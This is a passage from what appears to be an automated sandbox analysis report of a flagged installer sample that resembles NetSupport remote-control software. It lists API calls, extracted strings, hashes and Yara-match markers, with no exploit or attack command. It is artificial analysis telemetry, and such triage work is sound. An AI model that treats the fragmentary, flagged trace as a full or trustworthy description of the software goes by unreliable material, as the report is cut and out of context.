                                                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                          • String ID:
                                                                                          • API String ID: 1445889803-0
                                                                                          • Opcode ID: 92e18bc28f9b411dc402c37cb1addb572da5e9c6a61d90a00d94a6685b4d7015
                                                                                          • Instruction ID: e58a0c9a9e16b431d45986c78abe20c82eb787c880d1f095537970ed396595f6
                                                                                          • Opcode Fuzzy Hash: 92e18bc28f9b411dc402c37cb1addb572da5e9c6a61d90a00d94a6685b4d7015
                                                                                          • Instruction Fuzzy Hash: 7011E972D043249FCB119BF8DC489EABBF5FB48355F560911F515E7110DA349D008BD2
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 005B46ED
                                                                                          • OpenServiceW.ADVAPI32(00000000,?,00000004), ref: 005B4701
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005B4712
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005B471F
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005B4726
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandleOpen$ManagerQueryStatus
                                                                                          • String ID:
                                                                                          • API String ID: 2623946379-0
                                                                                          • Opcode ID: 5ac6d513462cc5d8b60b7abf93100b8b9a4d5920da8994cf5fbdf6c9ed9208d3
                                                                                          • Instruction ID: e80ff3068e4b26048730bc03673bd394b954a017545dc01be0eec0d78ba5599a
                                                                                          • Opcode Fuzzy Hash: 5ac6d513462cc5d8b60b7abf93100b8b9a4d5920da8994cf5fbdf6c9ed9208d3
                                                                                          • Instruction Fuzzy Hash: 0DF0A736641520BBE7211B24AC59FEB3B7DEB8BB62F08900AFA15C7240DF71D801CA70
                                                                                          APIs
                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000100), ref: 005D408E
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: DirectoryWindows
                                                                                          • String ID: .lnk$\Profiles\All Users\Start Menu\Programs\$rb+
                                                                                          • API String ID: 3619848164-1848683015
                                                                                          • Opcode ID: 73165f98f0455afeb5c1e9d66f89532a5fbbbc99d6e1916abe91ee8aa8c68824
                                                                                          • Instruction ID: 5336ebdcb692ee57112e5693fa3034cda4f8885ab73e9f8090177b81c776da10
                                                                                          • Opcode Fuzzy Hash: 73165f98f0455afeb5c1e9d66f89532a5fbbbc99d6e1916abe91ee8aa8c68824
                                                                                          • Instruction Fuzzy Hash: C3310E31A0061A97CB34EB68DD1ABDB77A6FF84310F548196E9099B381EB715D40CBD0
                                                                                          APIs
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: DebugOutputStringwsprintf
                                                                                          • String ID: ICFConfig("%s", %d, "%s")$Undefined product
                                                                                          • API String ID: 1959131528-3451686069
                                                                                          • Opcode ID: 6a88f145d253ab7d7e1bfa53d727d1a636637739c013a3bd2c30125e81038c2b
                                                                                          • Instruction ID: 87f9101b24d0b3e25e329dea0d63f41adf9fbcf5643ddf42b4c88ef0849f4d67
                                                                                          • Opcode Fuzzy Hash: 6a88f145d253ab7d7e1bfa53d727d1a636637739c013a3bd2c30125e81038c2b
                                                                                          • Instruction Fuzzy Hash: A131BD766006049FC710DB68DC85F7E7BA6FF8A314F158158F95A9B351EA31ED01CBA0
                                                                                          APIs
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 005C8F85
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: ..\CTL32\util.cpp$nsmdir >= 0 && nsmdir < GP_MAX$psz != szTempExpanded
                                                                                          • API String ID: 237503144-2386058402
                                                                                          • Opcode ID: 89ede5f4e3dedfdca53f3ef38af04314ab71b1dbe4d9e26fbb17b8330e075080
                                                                                          • Instruction ID: aef9adc413e826378ec0fa279277e27b9492fbbd41fd7f0dbb8ccce8fb815392
                                                                                          • Opcode Fuzzy Hash: 89ede5f4e3dedfdca53f3ef38af04314ab71b1dbe4d9e26fbb17b8330e075080
                                                                                          • Instruction Fuzzy Hash: 7E31F8B59003055ADB30AFA4DC5AFFA7BB5BB84304F14915DE94493192FF70AA84C691
                                                                                          APIs
                                                                                          • RegQueryValueExW.ADVAPI32(?,InstallLocation,00000000,00000000,?,00000400), ref: 005A629C
                                                                                          • RegQueryValueExW.ADVAPI32(?,DisplayIcon,00000000,00000000,?,00000400), ref: 005A62DA
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID: DisplayIcon$InstallLocation
                                                                                          • API String ID: 3660427363-1034514769
                                                                                          • Opcode ID: 3b9ff00007ca512fe41546adc5341b6bf592ab638be1f2fc8af615da154ca911
                                                                                          • Instruction ID: f1a9fbb11e526f0badf24f4724340b18e63ee02c71e1c7aefb58c98a95cba35b
                                                                                          • Opcode Fuzzy Hash: 3b9ff00007ca512fe41546adc5341b6bf592ab638be1f2fc8af615da154ca911
                                                                                          • Instruction Fuzzy Hash: 8031D6F59002099ACF24DB54CD56FDF7778EF88704F084599E709AB181EBB06B46CB98
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 005E2099
                                                                                          • DeleteAce.ADVAPI32(00000104,00000000), ref: 005E2106
                                                                                          • LocalFree.KERNEL32(?), ref: 005E2124
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: AddressDeleteFreeLocalProc
                                                                                          • String ID: GetNamedSecurityInfoW
                                                                                          • API String ID: 3891521895-3879530689
                                                                                          APIs
                                                                                          • RegCreateKeyW.ADVAPI32(?,?,?), ref: 005AED91
                                                                                          • RegDeleteKeyW.ADVAPI32(?,-00000002), ref: 005AEDA6
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AEDC5
                                                                                          Strings
                                                                                          • RegDeleteKey(%s, %s) ret %d, xrefs: 005AEDB1
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateDelete
                                                                                          • String ID: RegDeleteKey(%s, %s) ret %d
                                                                                          • API String ID: 716773620-1181619153
                                                                                          APIs
                                                                                          • GetProfileStringW.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 005C31EE
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProfileString
                                                                                          • String ID: ,,LPT1:$Device$Windows
                                                                                          • API String ID: 1468043044-2967085602
                                                                                          APIs
                                                                                          • GetStockObject.GDI32(0000000D), ref: 00594538
                                                                                          • GetObjectW.GDI32(00000000,0000005C,?), ref: 00594545
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$Stock
                                                                                          • String ID: Courier$Terminal
                                                                                          • API String ID: 1996491644-3811170643
                                                                                          APIs
                                                                                          • RegCreateKeyW.ADVAPI32(?,?,?), ref: 005AED91
                                                                                          • RegDeleteKeyW.ADVAPI32(?,-00000002), ref: 005AEDA6
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AEDC5
                                                                                          Strings
                                                                                          • RegDeleteKey(%s, %s) ret %d, xrefs: 005AEDB1
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateDelete
                                                                                          • String ID: RegDeleteKey(%s, %s) ret %d
                                                                                          • API String ID: 716773620-1181619153
                                                                                          APIs
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 005D4C71
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CopyFile
                                                                                          • String ID: localmon$pcimon$pcimon.dll
                                                                                          • API String ID: 1304948518-3058681259
                                                                                          APIs
                                                                                          • InterlockedIncrement.KERNEL32(0063B6D0), ref: 005B00BA
                                                                                          • wsprintfW.USER32 ref: 005B00E6
                                                                                          • CreateEventW.KERNEL32(?,?,?,?), ref: 005B0106
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateEventIncrementInterlockedwsprintf
                                                                                          • String ID: %s_L%d_%x
                                                                                          • API String ID: 608154824-3441399356
                                                                                          APIs
                                                                                          • GetMenuItemCount.USER32(?), ref: 005C6B8C
                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000001,?), ref: 005C6BC6
                                                                                          • SetMenuItemInfoW.USER32(?,00000000,00000001,00000030), ref: 005C6BEF
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ItemMenu$Info$Count
                                                                                          • String ID: 0
                                                                                          • API String ID: 4286743509-4108050209
                                                                                          APIs
                                                                                          • RegQueryValueExW.ADVAPI32(?,UninstallString,00000000,?,?,?), ref: 005DAF5D
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005DAF68
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005DAFE2
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005DB01C
                                                                                          • CloseHandle.KERNEL32(?), ref: 005DB02F
                                                                                          • CloseHandle.KERNEL32(?), ref: 005DB038
                                                                                          • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 005DB04D
                                                                                          • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 005DB07D
                                                                                          Strings
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close$Handle$CreateDeleteLoadObjectOpenProcessQuerySingleStringValueWaitwvsprintf
                                                                                          • String ID: UninstallString
                                                                                          • API String ID: 736679967-1433857529
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(user32.dll), ref: 005C69D0
                                                                                          • GetProcAddress.KERNEL32(00000000,SetGestureConfig), ref: 005C69E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: SetGestureConfig$user32.dll
                                                                                          • API String ID: 2574300362-2478114855
                                                                                          • Opcode ID: 71eae405f5a3f1d5528bd93bdcbd3e727cc9f2e879d27bd2869392a8ad9cceec
                                                                                          • Instruction ID: 660b0bb0f97e4072fdc092c05cd3979da34e665a8c7a59eb4d5c6d3eec632464
                                                                                          • Opcode Fuzzy Hash: 71eae405f5a3f1d5528bd93bdcbd3e727cc9f2e879d27bd2869392a8ad9cceec
                                                                                          • Instruction Fuzzy Hash: AC11A170E00209EAEF10DFA5C849BEE7BB8EB04704F40805DE815A7281DBB55A048B95
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,0000042C), ref: 005D472F
                                                                                            • Part of subcall function 005D3B00: SetWindowLongW.USER32(?,000000FC,?), ref: 005D3B0D
                                                                                            • Part of subcall function 005E7CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,752F55F0,?,005B97EE,00000000,?,?), ref: 005E7CE9
                                                                                          • SendMessageW.USER32(00000000,0000000C,00000000,00000000), ref: 005D4798
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeapItemLongMessageSendWindow
                                                                                          • String ID: buf$e:\nsmsrc\nsm\1410\1410\nt\winst32.c
                                                                                          • API String ID: 2295614352-821064217
                                                                                          • Opcode ID: 2bfade649c5aff403709b4b3a26bac09122fe1fc62d7bba7fda2d8dbeda5ce50
                                                                                          • Instruction ID: 1de512bcc0458ecdab572e3fa439a5652baf9ba5b77962290f5c8fa5b2145ba1
                                                                                          • Opcode Fuzzy Hash: 2bfade649c5aff403709b4b3a26bac09122fe1fc62d7bba7fda2d8dbeda5ce50
                                                                                          • Instruction Fuzzy Hash: 70F0F972AC531632E62032655C8FFBB2E4C9F86B50F504011F648791C3E6A45D0185B6
                                                                                          APIs
                                                                                            • Part of subcall function 005C8BC0: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005C8C1C
                                                                                            • Part of subcall function 005C8BC0: SHGetFolderPathW.SHFOLDER(00000000,00000026,00000000,00000000,?,?,?), ref: 005C8C5F
                                                                                            • Part of subcall function 005C8BC0: SHGetFolderPathW.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 005C8CB7
                                                                                          • wsprintfW.USER32 ref: 005CED4E
                                                                                          • wsprintfW.USER32 ref: 005CED64
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FolderPathwsprintf$FileModuleName
                                                                                          • String ID: %sNSA.LIC$%sNSM.LIC
                                                                                          • API String ID: 341647881-3388120946
                                                                                          • Opcode ID: c853f869bfd00f0f603b1a3eca580d5e8e4ab869b6eda645570d7a1ce44d8609
                                                                                          • Instruction ID: 63ee4bf1ad310d7d2f136ae262b9a27bfdfe4d27d76a5b6a581dd6cd8b743cfa
                                                                                          • Opcode Fuzzy Hash: c853f869bfd00f0f603b1a3eca580d5e8e4ab869b6eda645570d7a1ce44d8609
                                                                                          • Instruction Fuzzy Hash: DF01D8B1D0521C6ACB10EBF09C47FEF7B6DAB84304F04459DB9099B142ED71AE048AE1
                                                                                          APIs
                                                                                          • RemoveDirectoryW.KERNEL32(0063C848,00000000,?,005DCF57), ref: 005D6961
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DirectoryRemove
                                                                                          • String ID: cic\delta.zip$cic\setup.exe$cic\setup.msi
                                                                                          • API String ID: 597925465-3980332394
                                                                                          • Opcode ID: 21e9a98c9941e4cfc25def787883347ba544dfd46ab2beef52c5e826740ecc00
                                                                                          • Instruction ID: 68c73dd8b121ad118004d4c4b4768b8cc5aa4ed6a5092f1f43c9bebea2bde7ac
                                                                                          • Opcode Fuzzy Hash: 21e9a98c9941e4cfc25def787883347ba544dfd46ab2beef52c5e826740ecc00
                                                                                          • Instruction Fuzzy Hash: 6D11C03AA00B119EC7219F2CDC2B6677BB2FF86390F055456F8428B324F7315A56C7A6
                                                                                          APIs
                                                                                            • Part of subcall function 005E7CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,752F55F0,?,005B97EE,00000000,?,?), ref: 005E7CE9
                                                                                          • wsprintfW.USER32 ref: 005C2398
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeapwsprintf
                                                                                          • String ID: %02x$%02x, $..\CTL32\util.cpp
                                                                                          • API String ID: 1352872168-1263427399
                                                                                          • Opcode ID: cef0cc092f2744738323f027b709845ea5f3ad3b0e88523b326c1932f5ed82a9
                                                                                          • Instruction ID: 7fcda010446415fd734f3f894151075834dc2e0bd2fbbc7ed1f14d13b13f2adc
                                                                                          • Opcode Fuzzy Hash: cef0cc092f2744738323f027b709845ea5f3ad3b0e88523b326c1932f5ed82a9
                                                                                          • Instruction Fuzzy Hash: CE012BB25042456BCB109F95DC50DDA7B9AFFD8720F194139E9098B200E575A9418BA0
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 005B437E
                                                                                          • GetProcAddress.KERNEL32(00000000,_TrackMouseEvent), ref: 005B439A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: _TrackMouseEvent$comctl32.dll
                                                                                          • API String ID: 2574300362-2314894490
                                                                                          • Opcode ID: 98131117563da4d5a54ae9e764896a86c0f209e73d79101fdaae7a4f0649f6f7
                                                                                          • Instruction ID: 8a1215e6d0bb20bc47be633b42a5b71d5016cdf853a3b9ba077200eca22de114
                                                                                          • Opcode Fuzzy Hash: 98131117563da4d5a54ae9e764896a86c0f209e73d79101fdaae7a4f0649f6f7
                                                                                          • Instruction Fuzzy Hash: 5D111B7090430A9FDB14DFA9D8457AE7BF6FB08304F046969E825D3251E7719640CF90
                                                                                          APIs
                                                                                          • FindWindowExW.USER32(00000000,00000000,Shell_TrayWnd,00000000), ref: 005E03A4
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 005E03B5
                                                                                          • FindWindowExW.USER32(00000000,00000000,Shell_TrayWnd,00000000), ref: 005E03C8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$Find$Long
                                                                                          • String ID: Shell_TrayWnd
                                                                                          • API String ID: 189972333-2988720461
                                                                                          • Opcode ID: 2487019385aefe3c596c81ec37366aeb49d507d5edde8b3af81a02a309582b0b
                                                                                          • Instruction ID: 60421417c6b5bb3814ddf73b629cd44a2c68c6e250b37093412564a0e45be031
                                                                                          • Opcode Fuzzy Hash: 2487019385aefe3c596c81ec37366aeb49d507d5edde8b3af81a02a309582b0b
                                                                                          • Instruction Fuzzy Hash: 53E09233A82B7573D63111AE6C41FDB47499B99B71F261252F600BB2D086D0EC8219F4
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window
                                                                                          • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                          • API String ID: 2353593579-1331251348
                                                                                          • Opcode ID: c340e247231be10d23fcd7ac12f8f3f43d316f8da5df4882e36313bc233e9db5
                                                                                          • Instruction ID: 22ded5157a1dc63238cc2650d27eb0945e3a8001a6f1dbc1a4b75ceef8c0fd01
                                                                                          • Opcode Fuzzy Hash: c340e247231be10d23fcd7ac12f8f3f43d316f8da5df4882e36313bc233e9db5
                                                                                          • Instruction Fuzzy Hash: 4AF08922B8031567C6312991FC06EDB7F59ABE1F60F194135FC0866183E371B94149E6
                                                                                          APIs
                                                                                          • RegSetValueExW.ADVAPI32(?,?,00000000,?,.HY,?,00000000,00000000,00000000,?,0059482E,?,?,00000000,U^Y), ref: 005B4DED
                                                                                            • Part of subcall function 005B4640: wvsprintfW.USER32(?,00596384,?), ref: 005B466B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Valuewvsprintf
                                                                                          • String ID: .HY$Error %d setting %s$U^Y
                                                                                          • API String ID: 140283604-1145732432
                                                                                          • Opcode ID: d844df53ea076523ac8f53a61512ab8c4a78d79d2089f422bb083a9a57fde5f0
                                                                                          • Instruction ID: 6c7a4e96689a49480621f62cb41609502a8dc8c484476806830b1f280738ebb2
                                                                                          • Opcode Fuzzy Hash: d844df53ea076523ac8f53a61512ab8c4a78d79d2089f422bb083a9a57fde5f0
                                                                                          • Instruction Fuzzy Hash: FEE065B67002197BD620DE49EC85FAB7B6CEB89B54F144015FD04D7342D670EC1086F0
                                                                                          APIs
                                                                                          • GetDeviceCaps.GDI32(?,0000000E), ref: 005B6322
                                                                                          • GetDeviceCaps.GDI32(?,0000000C), ref: 005B6329
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CapsDevice
                                                                                          • String ID: ..\CTL32\pcibmp.cpp$nColors
                                                                                          • API String ID: 328075279-4292231205
                                                                                          • Opcode ID: 1c2647ef9180bbbe29bdfb1b2b5282ffa651e79c4c9efd6364969ec8aaed0384
                                                                                          • Instruction ID: 4e79e390a2571eda794efd0cd3a89aab821af6624d4d6d037140f8f597f4ce36
                                                                                          • Opcode Fuzzy Hash: 1c2647ef9180bbbe29bdfb1b2b5282ffa651e79c4c9efd6364969ec8aaed0384
                                                                                          • Instruction Fuzzy Hash: 89E04823B4132837E61021996D46FC6F79D6B95B69F060136FF04BB2D2D5D1AD4046E0
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005D4877
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • MessageBoxW.USER32(00000000,?,WINST32,00000000), ref: 005D489C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$LocalMessageTimewvsprintf
                                                                                          • String ID: Assert failed, file %hs, line %d$WINST32
                                                                                          • API String ID: 3290899936-2703300672
                                                                                          • Opcode ID: f5c462b8fa6d4c3069a2638095bd7d7a0c167e790af344ff75e32f1124da2c48
                                                                                          • Instruction ID: fde164f57c5cec5a5ec7758c3680f29534db22059a3032ed370eb501b1e27b1d
                                                                                          • Opcode Fuzzy Hash: f5c462b8fa6d4c3069a2638095bd7d7a0c167e790af344ff75e32f1124da2c48
                                                                                          • Instruction Fuzzy Hash: 2BF012B994030DBBD714EFA4DC5EF99777AEB04704F00C455B7199B182E570BA448F61
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(mscoree.dll,?,005EC959,?,?,005F925A,000000FF,0000001E,006336B0,0000000C,005F9305,?,?,?,005F2AA8,0000000D), ref: 005EC92B
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005EC93B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 1646373207-1276376045
                                                                                          • Opcode ID: 580ae13580f5d88657e325492f98853d43fa3a2575a589d34e74197f525242d5
                                                                                          • Instruction ID: f84a9ae2ed38b5b5b233363413fc9c4d52a9b06cb3389b2f8e77551a57ee726f
                                                                                          • Opcode Fuzzy Hash: 580ae13580f5d88657e325492f98853d43fa3a2575a589d34e74197f525242d5
                                                                                          • Instruction Fuzzy Hash: F9D022302003163BCB001FE7EC48D463E0FFE80B623098010F81EC2092CEA5E811C873
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 005C2FBE
                                                                                          • GetProcAddress.KERNEL32(00000000,_TrackMouseEvent), ref: 005C2FCF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: _TrackMouseEvent$comctl32.dll
                                                                                          • API String ID: 2574300362-2314894490
                                                                                          • Opcode ID: 18ddd32cadd1839d3184ba11f5bef0b2d0ce53a072379f327589e5813f1d40df
                                                                                          • Instruction ID: c48319b00525e07b636348a22eb667ee234ede81e20a8c3611216ca29c12c5fc
                                                                                          • Opcode Fuzzy Hash: 18ddd32cadd1839d3184ba11f5bef0b2d0ce53a072379f327589e5813f1d40df
                                                                                          • Instruction Fuzzy Hash: 52C012B02413015ED7105F649C59B823A6BB74070AF496409F411821A0E775C0409AB2
                                                                                          APIs
                                                                                            • Part of subcall function 005F220A: GetOEMCP.KERNEL32(00000000), ref: 005F2233
                                                                                            • Part of subcall function 005F5ACE: Sleep.KERNEL32(00000000,00000001,?,?,005F9275,00000018,006336B0,0000000C,005F9305,?,?,?,005F2AA8,0000000D,?,005B97EE), ref: 005F5AEF
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F2523
                                                                                          • InterlockedIncrement.KERNEL32(00000000), ref: 005F2548
                                                                                          • InterlockedDecrement.KERNEL32 ref: 005F25DA
                                                                                          • InterlockedIncrement.KERNEL32(00000000), ref: 005F25FE
                                                                                            • Part of subcall function 005E79A7: HeapFree.KERNEL32(00000000,00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79BD
                                                                                            • Part of subcall function 005E79A7: GetLastError.KERNEL32(00000000,?,005F2B7C,00000000,?,005B97EE,00000000), ref: 005E79CF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
